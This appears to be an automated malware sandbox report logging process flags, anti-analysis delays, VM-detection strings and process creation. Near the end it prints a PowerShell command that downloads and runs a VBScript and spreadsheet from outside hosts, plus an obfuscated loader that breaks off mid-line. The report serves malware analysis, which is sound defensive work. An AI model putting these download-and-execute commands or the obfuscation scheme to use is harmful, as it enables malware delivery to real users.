            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3753Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6080Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6401Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3354Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8155Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1539Jump to behavior
            Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 4510Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -13835058055282155s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 5528Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4936Thread sleep count: 6401 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4936Thread sleep count: 3354 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3364Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5440Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 4260Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
            Source: wscript.exe, 00000004.00000002.1562795081.000001989DCAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: powershell.exe, 00000007.00000002.1721128317.00000263F9D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
            Source: wscript.exe, 00000004.00000002.1562335999.000001989DB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\LMEM
            Source: wscript.exe, 00000004.00000003.1531458344.000001989DB68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1532332515.000001989DB68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1533655768.000001989DB68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1551176476.000001989DB68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1548012524.000001989DB68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1533413275.000001989DB68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.1562335999.000001989DB68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1533174068.000001989DB68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1549894823.000001989DB68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2751553582.0000020DA942B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2760451568.0000020DAEA54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000004.00000003.1533634559.000001989BB9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1554472467.000001989BB9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1531865535.000001989BBB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.1562018894.000001989BB9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1547339380.000001989BB9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1532097657.000001989BBB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
            Source: powershell.exe, 00000002.00000002.2848607699.000002DDF8769000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Yara matchFile source: amsi64_4352.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6364, type: MEMORYSTR
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\tk4f2qxkb.vbs" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\bsxhli2ob.xlsx"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $ReeJump to behavior
